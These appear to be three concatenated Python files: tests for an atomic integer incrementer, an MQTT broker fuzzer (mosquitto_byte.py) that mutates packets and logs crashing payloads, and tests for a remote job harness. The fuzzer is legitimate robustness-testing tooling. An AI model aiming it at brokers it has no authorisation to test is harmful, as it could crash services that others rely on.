def test_no_redefine_value(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
t = AtomicIntegerIncrementer('message_id', 3)
t['message_id'] = 1
assert t['message_id'] == 3
del t['message_id']
del t['message_id']
finally:
cleanup()
def test_increments_with_step(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
t = AtomicIntegerIncrementer('message_id', '4 | step=10')
t = AtomicIntegerIncrementer('test', '10 | step=20')
assert t['message_id'] == 4
assert t['message_id'] == 14
assert t['test'] == 10
assert t['test'] == 30
del t['message_id']
del t['test']
with pytest.raises(ValueError):
AtomicIntegerIncrementer('test', '| step=10')
with pytest.raises(ValueError):
AtomicIntegerIncrementer('test', 'asdf | step=10')
with pytest.raises(ValueError):
AtomicIntegerIncrementer('test', '10 | step=asdf')
with pytest.raises(ValueError):
AtomicIntegerIncrementer('test', '0xFF | step=0x01')
finally:
cleanup()
def test_json_serializable(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
t = AtomicIntegerIncrementer('message_id', 1)
jsondumps(t['message_id'])
finally:
cleanup()
def test_multi_thread(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
start_value: int = 2
num_threads: int = 20
num_iterations: int = 1001
expected_value = start_value + num_threads * num_iterations
t = AtomicIntegerIncrementer('thread_var', start_value)
values: Set[int] = set()
def func1() -> None:
for _ in range(num_iterations):
value = t.__getitem__('thread_var')
assert value is not None
assert value > start_value - 1
assert value not in values
values.add(value)
threads: List[threading.Thread] = []
for _ in range(num_threads):
thread = threading.Thread(target=func1)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert t['thread_var'] == expected_value
finally:
cleanup()
def test_multi_greenlet(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
start_value: int = 2
num_threads: int = 20
num_iterations: int = 1001
expected_value = start_value + num_threads * num_iterations
t = AtomicIntegerIncrementer('greenlet_var', start_value)
values: Set[int] = set()
def exception_handler(greenlet: gevent.Greenlet) -> None:
raise RuntimeError(f'func1 did not validate for {greenlet}')
def func1() -> None:
for _ in range(num_iterations):
value = t.__getitem__('greenlet_var')
assert value is not None
assert value > start_value - 1
assert value not in values
values.add(value)
greenlets: List[Greenlet] = []
for _ in range(num_threads):
greenlet = gevent.spawn(func1)
greenlet.link_exception(exception_handler)
greenlets.append(greenlet)
try:
gevent.joinall(greenlets)
for greenlet in greenlets:
greenlet.get()
except RuntimeError as e:
pytest.fail(str(e))
assert len(values) == num_threads * num_iterations
assert t['greenlet_var'] == expected_value
finally:
cleanup()
|
mosquitto_byte.py
|
import socket
import random
import time
import sys
import argparse
import math
import os
import os.path
import select
import subprocess
import difflib
import threading
from os import path
from datetime import datetime
from difflib import SequenceMatcher
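# Overview (descriptive note): this fuzzer mutates seed MQTT packets from mqtt_corpus/,
# optionally re-sourcing payloads from previously logged crashes or broker responses,
# sends them to the target broker, and records crashes, network responses and
# stdout/stderr ("filestream") responses under the output directory.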
# Remove bytes in a string
# f : the fuzzable object
# nb : the number of bytes to remove in f
def remove(f, nb):
for n in range(nb):
base = random.randint(0, len(f))
f = f[0:base] + f[base + 1:]
return f
# Add bytes in a string
# f : the fuzzable object
# nb : the number of bytes to add to f
def add(f, nb):
for n in range(nb):
base = random.randint(0, len(f))
byte = random.getrandbits(8).to_bytes(1, sys.byteorder)
f = f[0:base] + byte + f[base:]
return f
# Mutate bytes in a string
# f : the fuzzable object
# nb : the number of bytes to mutate in f
def mutate(f, nb):
bits = random.sample(range(len(f)), min(nb, len(f)))
for b in bits:
byte = random.getrandbits(8).to_bytes(1, sys.byteorder)
f = f[0:b] + byte + f[b + 1:]
return f
def get_payload(file):
f = open(file, "r")
packets = f.read().splitlines()
selection = random.choice(packets)
f.close()
return bytearray.fromhex(selection)
def get_all_payloads():
all_payloads = {
"connect": get_payload("mqtt_corpus/CONNECT"),
"connack": get_payload("mqtt_corpus/CONNACK"),
"pingreq": get_payload("mqtt_corpus/PINGREQ"),
"pingresp": get_payload("mqtt_corpus/PINGRESP"),
"auth": get_payload("mqtt_corpus/AUTH"),
"publish": get_payload("mqtt_corpus/PUBLISH"),
"puback": get_payload("mqtt_corpus/PUBACK"),
"pubrec": get_payload("mqtt_corpus/PUBREC"),
"pubrel": get_payload("mqtt_corpus/PUBREL"),
"pubcomp": get_payload("mqtt_corpus/PUBCOMP"),
"subscribe": get_payload("mqtt_corpus/SUBSCRIBE"),
"suback": get_payload("mqtt_corpus/SUBACK"),
"unsubscribe": get_payload("mqtt_corpus/UNSUBSCRIBE"),
"unsuback": get_payload("mqtt_corpus/UNSUBACK"),
"disconnect": get_payload("mqtt_corpus/DISCONNECT"),
"reserved": get_payload("mqtt_corpus/RESERVED")
}
return all_payloads
# Return c / 100 * len(f), where c is a random number between a and b
# a : a number between 0 and 100
# b : a number between a and 100
# f : the fuzzable object
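# Worked example (illustrative numbers only): with len(f) == 200, a == 10 and b == 30,
# a draw of c == 20 yields round(20 / 100 * 200) == 40 bytes to operate on.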
def select_param_value(f, a, b):
if a == b:
c = round(a / 100 * len(f))
else:
c = random.choice(range(a, b))
c = round(c / 100 * len(f))
return c
def fuzz_target(f, params):
# Get number of bytes to mutate
num_mutate_bytes = select_param_value(f, params["min_mutate"], params["max_mutate"])
# Get number of bytes to add
if params["super_add_enable"] == 0:
num_add_bytes = random.randint(params["super_add_min"], params["super_add_max"])
else:
num_add_bytes = select_param_value(f, params["min_add"], params["max_add"])
# Get number of bytes to remove
num_remove_bytes = select_param_value(f, params["min_remove"], params["max_remove"])
# Randomize which operations we do
fuzz_opts = ["mutate", "add", "remove"]
fuzz_rounds = random.randint(params["min_fuzz_rounds"], params["max_fuzz_rounds"])
for fr in range(fuzz_rounds):
fuzz_selection = random.sample(fuzz_opts, random.randint(1, 3))
for s in fuzz_selection:
if s == "mutate":
f = mutate(f, num_mutate_bytes)
elif s == "add":
f = add(f, num_add_bytes)
elif s == "remove":
f = remove(f, num_remove_bytes)
return f
def source_payload_with_filestream_response(params):
f = open(output_directory + "/filestream_responses.txt", "r")
packets = f.readlines()[1:]
selection_index = random.randint(0, len(packets) - 1)
selection = packets[selection_index].split(",")[1]
payload = bytearray.fromhex(selection)
f.close()
return fuzz_target(payload, params), selection_index
def source_payload_with_network_response(params):
f = open(output_directory + "/network_responses.txt", "r")
packets = f.read().splitlines()[1:]
selection_index = random.randint(0, len(packets) - 1)
selection = packets[selection_index].split(",")[1]
payload = bytearray.fromhex(selection)
f.close()
return fuzz_target(payload, params), selection_index
def source_payload_with_crash(params):
f = open(output_directory + "/crashes.txt", "r")
packets = f.read().splitlines()[1:]
selection_index = random.randint(0, len(packets) - 1)
selection = packets[selection_index].split(",")[11]
payload = bytearray.fromhex(selection)
f.close()
return fuzz_target(payload, params), selection_index
# Return a tuple (a, b) where a and b are between abs_min and abs_max and a <= b
def get_min_max(abs_min, abs_max):
a = random.randint(abs_min, abs_max)
b = random.randint(abs_min, abs_max)
if a < b:
return (a, b)
return (b, a)
def get_params():
min_mutate, max_mutate = get_min_max(0, 10 * fuzz_intensity)
min_add, max_add = get_min_max(0, 10 * fuzz_intensity)
super_add_min, super_add_max = get_min_max(0, 1000 * fuzz_intensity)
super_add_enable = random.randint(0, 50)
min_remove, max_remove = get_min_max(0, 10 * fuzz_intensity)
min_fuzz_rounds, max_fuzz_rounds = get_min_max(0, fuzz_intensity)
    # Counter-intuitively, a sourcing value of 0 means the fuzzer WILL source from that target. For example, sourcing_from_crash == 0 (guaranteed when source_frequency == 4) means we source the payload from the crashes log.
if source_frequency == 0:
sourcing_from_crash = 1
elif source_frequency == 1:
sourcing_from_crash = random.randint(0, 100)
elif source_frequency == 2:
sourcing_from_crash = random.randint(0, 10)
elif source_frequency == 3:
sourcing_from_crash = random.randint(0, 1)
else:
sourcing_from_crash = 0
if network_response_frequency == 0:
sourcing_from_network = 1
elif network_response_frequency == 1:
sourcing_from_network = random.randint(0, 100)
elif network_response_frequency == 2:
sourcing_from_network = random.randint(0, 10)
elif network_response_frequency == 3:
sourcing_from_network = random.randint(0, 1)
else:
sourcing_from_network = 0
if filestream_response_frequency == 0:
sourcing_from_filestream = 1
elif filestream_response_frequency == 1:
sourcing_from_filestream = random.randint(0, 100)
elif filestream_response_frequency == 2:
sourcing_from_filestream = random.randint(0, 10)
elif filestream_response_frequency == 3:
sourcing_from_filestream = random.randint(0, 1)
else:
sourcing_from_filestream = 0
params = {
"min_mutate": min_mutate,
"max_mutate": max_mutate,
"min_add": min_add,
"max_add": max_add,
"super_add_enable": super_add_enable,
"super_add_min": super_add_min,
"super_add_max": super_add_max,
"min_remove": min_remove,
"max_remove": max_remove,
"min_fuzz_rounds": min_fuzz_rounds,
"max_fuzz_rounds": max_fuzz_rounds,
"sourcing_from_crash": sourcing_from_crash,
"sourcing_from_network": sourcing_from_network,
"sourcing_from_filestream": sourcing_from_filestream
}
return params
def check_duplicate_source(payload):
f = open(output_directory + "/crashes.txt", "r")
packets = f.read().splitlines()[1:]
f.close()
for p in packets:
curr = p.split(",")[11].strip(" ")
if payload.hex() == curr:
return True
return False
# Check for duplicate responses in the broker response log.
# This includes responses that are too similar, but not exactly
# duplicates.
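# Illustrative example: SequenceMatcher(None, "abcd", "abce").ratio() == 0.75, so with
# max_network_response_threshold == 0.5 such a response would be treated as a duplicate
# and skipped.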
def check_duplicate_network_response(response):
if not path.exists(output_directory + "/network_responses_raw.txt"):
return False
f = open(output_directory + "/network_responses_raw.txt", "r")
packets = f.read().splitlines()
f.close()
for p in packets:
similarity = SequenceMatcher(None, p, response.hex()).ratio()
if similarity >= max_network_response_threshold:
return True
return False
# Check for duplicate responses in the stream response log.
# This includes responses that are too similar, but not exactly
# duplicates.
def check_duplicate_filestream_response(response):
if not path.exists(output_directory + "/filestream_responses_raw.txt"):
return False
f = open(output_directory + "/filestream_responses_raw.txt", "r")
packets = f.read().splitlines()
f.close()
for p in packets:
similarity = SequenceMatcher(None, p, response).ratio()
if similarity >= max_filestream_response_threshold:
return True
return False
def get_last_index():
try:
f = open(output_directory + "/crashes.txt", "r")
last_entry = f.read().splitlines()[-1]
last_index = last_entry.split(",")[0]
f.close()
return int(last_index)
except (FileNotFoundError, ValueError):
return -1
def handle_network_response(payload, response):
if not path.exists(output_directory + "/network_responses.txt"):
f = open(output_directory + "/network_responses.txt", "w")
f.write("Timestamp, Payload, Response\n")
f.close()
duplicate_response = check_duplicate_network_response(response)
f = open(output_directory + "/network_responses.txt", "r")
f_len = len(f.read().splitlines())
f.close()
if not duplicate_response and f_len < max_network_response_entries:
f = open(output_directory + "/network_responses.txt", "a")
f.write("%s, %s, %s\n" % (datetime.now(), payload.hex(), response.hex()))
f.close()
f = open(output_directory + "/network_responses_raw.txt", "a")
f.write("%s\n" % response.hex())
f.close()
def stream_response_has_keyword(resp, payload):
f = open("keywords.txt", "r")
    keywords = f.read().splitlines()
    f.close()
for k in keywords:
if k.upper() in resp.upper():
return True
return False
def handle_filestream_response(proc):
if not path.exists(output_directory + "/filestream_responses.txt"):
f = open(output_directory + "/filestream_responses.txt", "w")
f.write("Timestamp, Payload, Response\n")
f.close()
for line in iter(proc.stdout.readline, b''):
# Remove in-line EOL characters
line = line.decode("latin").replace(r"\n", "").replace(r"\r", "")
if "current_payload" in globals():
has_keyword = stream_response_has_keyword(line, current_payload)
duplicate_response = check_duplicate_filestream_response(line)
            # Apply the documented filestream logging preference (see --flp help)
            logging_check = True
            if filestream_logging_preference == 0:
                logging_check = not has_keyword
            elif filestream_logging_preference == 1:
                logging_check = has_keyword
if logging_check and not duplicate_response:
f = open(output_directory + "/filestream_responses.txt", "a")
f.write("%s, %s, %s" % (datetime.now(), current_payload.hex(), line))
f.close()
f = open(output_directory + "/filestream_responses_raw.txt", "a")
f.write(line)
f.close()
def start_broker():
try:
proc = subprocess.Popen(broker_exe.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
if not no_filestream_response_log:
broker_thread = threading.Thread(target=handle_filestream_response, args=(proc,))
broker_thread.start()
if verbosity >= 1:
print("Waiting for broker to start")
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host, port))
s.close()
break
except ConnectionRefusedError:
time.sleep(0.1)
except FileNotFoundError:
print("The broker command/location you provided does not exist.")
exit()
def handle_crash():
if "last_fuzz" not in globals():
if verbosity >= 5:
print("There was an error connecting to the broker.")
try:
start_broker()
except NameError:
print("No MQTT process appears to be running at %s:%s, and you have not defined a broker exe. You must do one or the other." % (host, port))
exit()
else:
if not path.exists(output_directory + "/crashes.txt"):
f = open(output_directory + "/crashes.txt", "w")
f.write("Index, Timestamp, Seed, Fuzz intensity, Construct intensity, Crash index, Network response index, Filestream response index, Crash source frequency, Network source frequency, Filestream source frequency, Payload\n")
f.close()
seed = last_fuzz["seed"]
fi = last_fuzz["fuzz_intensity"]
ci = last_fuzz["construct_intensity"]
si = last_fuzz["crash_index"]
nri = last_fuzz["network_response_index"]
fri = last_fuzz["filestream_response_index"]
sf = last_fuzz["source_frequency"]
nrf = last_fuzz["network_response_frequency"]
frf = last_fuzz["filestream_response_frequency"]
payload = last_fuzz["payload"]
if verbosity >= 1:
print("The following payload crashed the program")
print(payload.hex())
index = get_last_index() + 1
duplicate_source = check_duplicate_source(payload)
if not duplicate_source:
f = open(output_directory + "/crashes.txt", "a")
f.write("%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s\n" % (index, datetime.now(), seed, fi, ci, si, nri, fri, sf, nrf, frf, payload.hex()))
f.close()
f = open(output_directory + "/crashes_raw.txt", "a")
f.write("%s\n" % payload.hex())
f.close()
if not restart_on_crash:
exit()
else:
start_broker()
# Construct the payload according to the construct intensity
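# Intensity levels as implemented below: 0 sends CONNECT + one random packet from a
# restricted subset + DISCONNECT; 1 samples 1-5 packets from that subset; 2 samples
# 1-10 packets of any type; 3 and above draws 1-20 packets with replacement.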
def construct_payload(all_payloads):
selected_payloads = []
if construct_intensity == 0:
allowed_payloads = ["auth", "pingreq", "pubcomp", "publish", "pubrec", "pubrel", "subscribe", "unsubscribe"]
payloads_subset = {e: all_payloads[e] for e in allowed_payloads}
selected_payloads.append("connect")
key, val = random.choice(list(payloads_subset.items()))
selected_payloads.append(key)
selected_payloads.append("disconnect")
elif construct_intensity == 1:
allowed_payloads = ["auth", "pingreq", "pubcomp", "publish", "pubrec", "pubrel", "subscribe", "unsubscribe"]
payloads_subset = {e: all_payloads[e] for e in allowed_payloads}
num_packets = random.randint(1, 5)
selected_payloads = dict(random.sample(list(payloads_subset.items()), num_packets)).keys()
elif construct_intensity == 2:
num_packets = random.randint(1, 10)
selected_payloads = dict(random.sample(list(all_payloads.items()), num_packets)).keys()
else:
num_packets = random.randint(1, 20)
for n in range(num_packets):
key, val = random.choice(list(all_payloads.items()))
selected_payloads.append(key)
enumerated_payloads = {}
payload = b""
for s in selected_payloads:
payload = payload + all_payloads[s]
enumerated_payloads[s] = all_payloads[s]
return (payload, enumerated_payloads)
def fuzz_payloads(all_payloads, params):
for a in all_payloads:
all_payloads[a] = fuzz_target(all_payloads[a], params)
return all_payloads
# Fuzz MQTT
c_len = -1
nr_len = -1
fr_len = -1
def fuzz(seed):
global last_fuzz, current_payload, c_len, nr_len, fr_len
random.seed(seed)
params = get_params()
if c_len < 2:
# Get number of entries in crash file so far
try:
f = open(output_directory + "/crashes.txt", "r")
c_len = len(f.read().splitlines())
f.close()
except FileNotFoundError:
c_len = -1
if nr_len < 2:
# Get number of entries in network response file so far
try:
f = open(output_directory + "/network_responses.txt", "r")
nr_len = len(f.read().splitlines())
f.close()
except FileNotFoundError:
nr_len = -1
if fr_len < 2:
# Get number of entries in filestream response file so far
try:
f = open(output_directory + "/filestream_responses.txt", "r")
fr_len = len(f.read().splitlines())
f.close()
except FileNotFoundError:
fr_len = -1
crash_index = None
network_response_index = None
filestream_response_index = None
# Order of preference for sourcing: crash log > filestream log > network log
# Don't source the fuzzer with anything
if (c_len < 2 or not params["sourcing_from_crash"] == 0) and (nr_len < 2 or not params["sourcing_from_network"] == 0) and (fr_len < 2 or not params["sourcing_from_filestream"] == 0):
all_payloads = fuzz_payloads(get_all_payloads(), params)
payload, enumerated_payloads = construct_payload(all_payloads)
# Source with previous crash
elif c_len >= 2 and params["sourcing_from_crash"] == 0:
payload, crash_index = source_payload_with_crash(params)
# Source with filestream response
elif fr_len >= 2 and params["sourcing_from_filestream"] == 0:
payload, filestream_response_index = source_payload_with_filestream_response(params)
# Source with network response
else:
payload, network_response_index = source_payload_with_network_response(params)
if payload_only:
print("\nCrash index: " + str(crash_index))
print("Network response index: " + str(network_response_index))
print("Filestream response index: " + str(filestream_response_frequency))
if not params["sourcing_from_crash"] == 0 and not params["sourcing_from_network"] == 0 and not params["sourcing_from_filestream"] == 0:
print("\nFuzzed payload:\t" + payload.hex())
for p in enumerated_payloads:
print("%s: %s" % (p, enumerated_payloads[p].hex()))
else:
print("\nFuzzed payload:\t" + payload.hex())
exit()
current_payload = payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host, port))
s.send(payload)
except ConnectionRefusedError:
handle_crash()
return
except ConnectionResetError:
return
if(verbosity >= 4):
print("Crash log index:\t", crash_index)
print("Network log index:\t", network_response_index)
print("Filestream log index:\t", filestream_response_index)
if(verbosity >= 1):
print("Fuzzed payload:\t\t", payload.hex())
ready = select.select([s], [], [], response_delay)
if ready[0]:
try:
response = s.recv(1024)
if not no_network_response_log:
handle_network_response(payload, response)
if verbosity >= 5:
print("Network response:\t", response.hex())
except ConnectionResetError:
if verbosity >= 4:
print("Error:\t\t\t Broker reset connection.")
else:
if verbosity >= 4:
print("Error:\t\t\tBroker was not ready for reading.")
s.close()
# Update the last fuzz params
last_fuzz = {
"seed": seed,
"fuzz_intensity": fuzz_intensity,
"construct_intensity": construct_intensity,
"crash_index": crash_index,
"network_response_index": network_response_index,
"filestream_response_index": filestream_response_index,
"source_frequency": source_frequency,
"network_response_frequency": network_response_frequency,
"filestream_response_frequency": filestream_response_frequency,
"payload": payload
}
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", help = "Fuzzing target host. Default is localhost.")
parser.add_argument("-P", "--port", help = "Fuzzing target port. Default is 1883.")
parser.add_argument("-B", "--broker_exe", help = "Set the broker exe command/location. If the broker crashes, this can be used to restart it.")
parser.add_argument("-R", "--restart_on_crash", help = "If set, the fuzzer will try to use the option provided by 'broker_exe' to restart the broker.", action = "store_true")
parser.add_argument("-s", "--seed", help = "Set the seed. If not set by the user, the system time is used as the seed.")
parser.add_argument("-fd", "--fuzz_delay", help = "Set the delay between each fuzzing attempt. Default is 0.1 seconds.")
parser.add_argument("-I", "--index", help = "Source the fuzzer using an index in the crashes.txt log file.")
parser.add_argument("-rd", "--response_delay", help="Set the delay between sending a packet and receiving the response from the broker. Default is whatever fuzz delay is set to.")
parser.add_argument("-m", "--max_runs", help = "Set the number of fuzz attempts made. If not set, the fuzzer will run until the broker crashes.")
parser.add_argument("-fi", "--fuzz_intensity", help = "Set the intensity of the fuzzer, from 0 to 10. 0 means packets are not fuzzed at all. Default is 3.")
parser.add_argument("-ci", "--construct_intensity", help = "Set the intensity of the payload constructer, from 0 to 3. The constructor decides what order to send packets. For example, 0 means all packets begin with CONNECT and end wth DISCONNECT. Default is 0.")
parser.add_argument("-sf", "--source_frequency", help = "Set the frequency of sourcing the fuzzer's input with a packet that previously triggered a crash, from 0 to 4. 0 means never source and 4 means always source. Default is 2.")
parser.add_argument("-nrf", "--network_response_frequency", help = "Set the frequency of sourcing the fuzzer's input with a packet that previously triggered a unique network response from the broker, from 0 to 4. 0 means never source and 4 means always source. Default is 2.")
parser.add_argument("-frf", "--filestream_response_frequency", help = "Set the frequency of sourcing the fuzzer's input with a packet that previously triggered an anamolous response to stdout or stderr, from 0 to 4. 0 means never source and 4 means always source. Default is 2.")
parser.add_argument("-mnt", "--max_network_response_threshold", help = "Set the maximum similarity threshold for entries in the broker response file, from 0 to 1. For example, a threshold of 0.3 means entries will be NOT logged if they are at least 30 percent similar to any other entry. Default is 0.5.")
parser.add_argument("-mft", "--max_filestream_response_threshold", help = "Set the maximum similarity threshold for entries in the filestream response file, from 0 to 1. Default is 0.5.")
parser.add_argument("-mne", "--max_network_response_entries", help = "Set the maximum number of entries allowed in the broker responses file. Fuzzer will not write to this file if the number of entries exceeds this value. Default is 150.")
parser.add_argument("-flp", "--filestream_logging_preference", help = "Set the preference of logging stdout/stderr responses from the broker. 0 means exclude responses that contain keywords in the keywords.txt file. 1 means exclude responses that do not contain keywords. 2 means do not exclude any responses. Default is 2.")
parser.add_argument("-nnl", "--no_network_response_log", help = "If set, do not log network responses from the broker.", action="store_true")
parser.add_argument("-nfl", "--no_filestream_response_log", help="If set, do not log filestream responses from the broker.", action="store_true")
parser.add_argument("-afi", "--auto_fuzz_intensity", help = "If set, the fuzz intensity changes randomly every run.", action="store_true")
parser.add_argument("-aci", "--auto_construct_intensity", help="If set, the construct intensity changes randomly every run.", action="store_true")
parser.add_argument("-v", "--verbosity", help = "Set verbosity, from 0 to 5. 0 means nothing is printed. Default is 1.")
parser.add_argument("-p", "--payload_only", help = "Do not fuzz. Simply return the payload before and after it is fuzzed. Also return the params.", action = "store_true")
parser.add_argument("-rp", "--repeat_payload", help = "Send the same payload over and over again. This essentially just keeps the seed at a fixed value.", action = "store_true")
parser.add_argument("-O", "--output_directory", help = "Set the output directory for files generated by the fuzzer. Default is 'outputs.")
args = parser.parse_args()
    global host, port, broker_exe, fuzz_intensity, construct_intensity, source_frequency, network_response_frequency, filestream_response_frequency, construct_payload, payload_only, verbosity, response_delay, restart_on_crash, no_network_response_log, no_filestream_response_log, max_network_response_entries, max_network_response_threshold, max_filestream_response_threshold, output_directory, filestream_logging_preference
if(args.host):
host = args.host
else:
host = "localhost"
if(args.port):
port = int(args.port)
else:
port = 1883
if args.output_directory:
output_directory = args.output_directory
else:
output_directory = "outputs"
if not path.exists(output_directory):
os.mkdir(output_directory)
# This arg means we just source from an index in crashes.txt. Handy for verifying a crash quickly.
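    # Assumed crashes.txt row layout, inferred from the fields read below
    # (0-indexed, comma-separated): field 2 = seed, 3 = fuzz intensity,
    # 4 = construct intensity, 8-10 = source / network response / filestream
    # response frequencies.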
if args.index:
crash_index = int(args.index)
f = open(output_directory + "/crashes.txt", "r")
selected_line = f.read().splitlines()[crash_index + 1].split(",")
f.close()
seed = int(selected_line[2])
fuzz_intensity = int(selected_line[3])
construct_intensity = int(selected_line[4])
source_frequency = int(selected_line[8])
network_response_frequency = int(selected_line[9])
filestream_response_frequency = int(selected_line[10])
else:
if(args.seed):
seed = int(args.seed)
else:
seed = math.floor(time.time())
if(args.fuzz_intensity):
fuzz_intensity = int(args.fuzz_intensity)
if fuzz_intensity > 10:
fuzz_intensity = 10
if fuzz_intensity < 0:
fuzz_intensity = 0
else:
fuzz_intensity = 3
if(args.construct_intensity):
construct_intensity = int(args.construct_intensity)
if construct_intensity > 3:
construct_intensity = 3
if construct_intensity < 0:
construct_intensity = 0
else:
construct_intensity = 0
if(args.source_frequency):
source_frequency = int(args.source_frequency)
if source_frequency < 0:
source_frequency = 0
if source_frequency > 4:
source_frequency = 4
else:
source_frequency = 2
if(args.network_response_frequency):
network_response_frequency = int(args.network_response_frequency)
if network_response_frequency < 0:
network_response_frequency = 0
if network_response_frequency > 4:
network_response_frequency = 4
else:
network_response_frequency = 2
if(args.filestream_response_frequency):
filestream_response_frequency = int(args.filestream_response_frequency)
if filestream_response_frequency < 0:
filestream_response_frequency = 0
if filestream_response_frequency > 4:
filestream_response_frequency = 4
else:
filestream_response_frequency = 2
if(args.fuzz_delay):
fuzz_delay = float(args.fuzz_delay)
else:
fuzz_delay = 0.1
if(args.response_delay):
response_delay = float(args.response_delay)
else:
response_delay = fuzz_delay
if(args.max_runs):
max_runs = int(args.max_runs)
if(args.auto_fuzz_intensity):
auto_fuzz_intensity = True
else:
auto_fuzz_intensity = False
if(args.auto_construct_intensity):
auto_construct_intensity = True
else:
auto_construct_intensity = False
if(args.verbosity):
verbosity = int(args.verbosity)
if verbosity > 5:
verbosity = 5
if verbosity < 0:
verbosity = 0
else:
verbosity = 1
if(args.no_network_response_log):
no_network_response_log = True
else:
no_network_response_log = False
if(args.no_filestream_response_log):
no_filestream_response_log = True
else:
no_filestream_response_log = False
if(args.max_network_response_entries):
max_network_response_entries = int(args.max_network_response_entries)
else:
max_network_response_entries = 150
if(args.max_network_response_threshold):
max_network_response_threshold = float(args.max_network_response_threshold)
if max_network_response_threshold < 0:
max_network_response_threshold = 0
if max_network_response_threshold > 1:
max_network_response_threshold = 1
else:
max_network_response_threshold = 0.5
if(args.max_filestream_response_threshold):
max_filestream_response_threshold = float(args.max_filestream_response_threshold)
if max_filestream_response_threshold < 0:
max_filestream_response_threshold = 0
if max_filestream_response_threshold > 1:
max_filestream_response_threshold = 1
else:
max_filestream_response_threshold = 0.5
if(args.filestream_logging_preference):
filestream_logging_preference = int(args.filestream_logging_preference)
if filestream_logging_preference < 0:
filestream_logging_preference = 0
if filestream_logging_preference > 2:
filestream_logging_preference = 2
else:
filestream_logging_preference = 2
if(args.payload_only):
payload_only = True
random.seed(seed)
params = get_params()
print("\nYour params: ", params)
else:
payload_only = False
if args.broker_exe and not payload_only:
broker_exe = args.broker_exe
start_broker()
time.sleep(0.1)
if(args.restart_on_crash):
restart_on_crash = True
if "broker_exe" not in globals():
print("You cannot restart on crash if the broker exe is not defined.")
exit()
else:
restart_on_crash = False
print("Hello fellow fuzzer :)")
print("Host: %s, Port: %d" % (host, port))
print("Base seed: ", seed)
print("Fuzz Intensity: ", fuzz_intensity)
print("Construct intensity: ", construct_intensity)
print("Source frequency: ", source_frequency)
print("Network response frequency: ", network_response_frequency)
print("Filestream response frequency: ", filestream_response_frequency)
print("\n")
total_runs = 1
while True:
if verbosity >= 1 and not payload_only:
print("\nRun:\t\t\t", total_runs)
if verbosity >= 3:
print("Seed:\t\t\t", seed)
if verbosity >= 4:
print("Fuzz intensity:\t\t", fuzz_intensity)
print("Construct intensity:\t", construct_intensity)
fuzz(seed)
time.sleep(fuzz_delay)
total_runs += 1
if not args.repeat_payload:
seed += 1
if 'max_runs' in locals():
max_runs -= 1
if max_runs <= 0:
exit()
if auto_fuzz_intensity and not args.repeat_payload:
fuzz_intensity = random.randint(0, 10)
if auto_construct_intensity and not args.repeat_payload:
construct_intensity = random.randint(0, 3)
if __name__ == "__main__":
main(sys.argv[1:])
|
test_linharn.py
|
from pytest import raises, fixture
from os import environ
from time import sleep, time
from copy import deepcopy
from multiprocessing import Process
import brain
import docker
from Harness_client import linharn
CLIENT = docker.from_env()
class Linharn_proc:
def __init__(self):
self.procs = []
def add_proc(self, func_):
self.procs.append(Process(target=func_))
return self.procs[-1]
@staticmethod
def wrap_loop():
client_info = "C_127.0.0.1_1"
linharn.control_loop(client_info)
SAMPLE_TARGET = {
"PluginName": "Harness",
"Location": "127.0.0.1",
"Port": "5000"
}
@fixture(scope="module")
def startup_brain():
old_log = environ.get("LOGLEVEL", "")
environ["LOGLEVEL"] = "DEBUG"
tag = environ.get("TRAVIS_BRANCH", "dev").replace("master", "latest")
CLIENT.containers.run(
"".join(("ramrodpcp/database-brain:", tag)),
name="rethinkdbtestapp",
detach=True,
ports={"28015/tcp": 28015},
remove=True,
)
    sleep(3)  # docker needs time to start up the DB
yield
try:
environ["LOGLEVEL"] = old_log
containers = CLIENT.containers.list()
for container in containers:
if container.name == "rethinkdbtestapp":
container.stop()
break
except SystemExit:
pass
@fixture(scope="function")
def proc():
old_plugin = environ.get("PLUGIN", "")
old_plugin_name = environ.get("PLUGIN_NAME", "")
old_stage = environ.get("STAGE", "")
old_port = environ.get("PORT", "")
environ["PLUGIN"] = "Harness"
environ["PLUGIN_NAME"] = "Harness-5000tcp"
environ["STAGE"] = "TESTING"
environ["PORT"] = "5000"
import server
plugin_instance = server.get_class_instance("Harness")
sleep(5)
process = Process(target=plugin_instance.start)
yield process
try:
process.terminate()
except:
pass
environ["PLUGIN"] = old_plugin
environ["PLUGIN_NAME"] = old_plugin_name
environ["STAGE"] = old_stage
environ["PORT"] = old_port
@fixture(scope="function")
def linux_harn():
proc_list = Linharn_proc()
yield proc_list
for proc in proc_list.procs:
try:
proc.terminate()
except:
pass
def test_linharn(startup_brain, proc, linux_harn):
# create the processes that will contact the Harness plugin
linux_harn.add_proc(Linharn_proc.wrap_loop)
# start the Harness plugin
proc.start()
while not proc.is_alive():
sleep(.5)
# start linux client
linux_harn.procs[0].start()
sleep(3)
# insert an echo job into database
echo = brain.queries.get_plugin_command("Harness", "echo", brain.connect())
echo_job = {
"Status" : "Waiting",
"StartTime": time(),
"JobTarget": SAMPLE_TARGET,
"JobCommand": echo
}
echo_job["JobCommand"]["Inputs"][0]["Value"] = "Hello World"
inserted = brain.queries.insert_jobs([echo_job], True, brain.connect())
loop = True
now = time()
# wait for the client to complete the job and get the result
while time() - now < 30 and loop is True:
out = brain.queries.get_output_content(inserted["generated_keys"][0], conn=brain.connect())
if out is not None:
loop = False
sleep(1)
assert out == "Hello World"
# insert a sleep job
sleep_job = {
"Status" : "Waiting",
"StartTime": time(),
"JobTarget": SAMPLE_TARGET,
"JobCommand": brain.queries.get_plugin_command("Harness", "sleep", brain.connect())
}
sleep_job["JobCommand"]["Inputs"][0]["Value"] = "3000"
inserted = brain.queries.insert_jobs([sleep_job], True, brain.connect())
loop = True
now = time()
# wait for the client to complete the job and get the result
while time() - now < 30 and loop is True:
out = brain.queries.get_output_content(inserted["generated_keys"][0], conn=brain.connect())
if out is not None:
loop = False
sleep(1)
assert out == ""
def test_many(startup_brain, proc, linux_harn):
proc.start()
while not proc.is_alive():
sleep(.5)
print("testing a lot of processes")
job_list = []
